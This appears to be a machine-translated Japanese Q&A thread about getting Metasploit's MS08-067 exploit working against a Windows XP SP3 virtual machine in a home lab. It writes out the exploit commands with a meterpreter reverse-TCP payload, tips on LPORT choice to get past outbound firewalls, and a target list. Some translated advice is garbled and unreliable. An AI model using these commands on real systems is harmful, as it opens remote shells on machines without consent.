自分のウェブカメラをハッキングしようとしています。ホスト PC は Linux Mint 17 です。ターゲットは Windows XP SP3 の VM インスタンスです。ターゲット IP - 192.168.1.6 マイ ホスト IP - 192.168.1.8
問題は、エクスプロイトを実行すると、脆弱性をトリガーしようとしていると表示され、何も起こらないことです。スナップショットが添付されています: Img リンクhttp://i.stack.imgur.com/EiPlr.png
私が使用しているコマンドは次のとおりです。
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.1.6
set LHOST 192.168.1.8
exploit
ほとんどの場合、Windows のターゲットにはパッチが適用されており、このエクスプロイトで攻撃することはできません。ただし、次のようなクライアント側のエクスプロイトを使用できます。ベースエクスプロイトのバックドア実行可能ファイルを参照し、...
別の LPORT を試すこともできます。通常は動作する LPORT 80 を使用してみてください。LPORT 443 を試行しない場合。これは、送信ファイアウォール ルールが原因である可能性があります。
metertpreter セッションを開きたいようです。これを前提として、ここに1つの提案があります.....
「show targets」コマンドを発行して、OS をターゲットとして明示的に設定してみてください。例: show targets の出力は次のようになります.... エクスプロイト ターゲット:
ID名
0 自動ターゲティング
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
6 Windows 2003 SP1 English (NO NX)
7 Windows 2003 SP1 English ( NX)
8 Windows 2003 SP2 英語 (NX なし)
9 Windows 2003 SP2 英語 (NX)
10 Windows XP SP2 アラビア語 (NX)
11 Windows XP SP2 中国語 - 繁体字 / 台湾 (NX) 次にコマンドを次のように発行します....
目標を設定 8
次に、「exploit」コマンドを発行します。
次に、meterpreter コンソールが開くかどうかを確認します。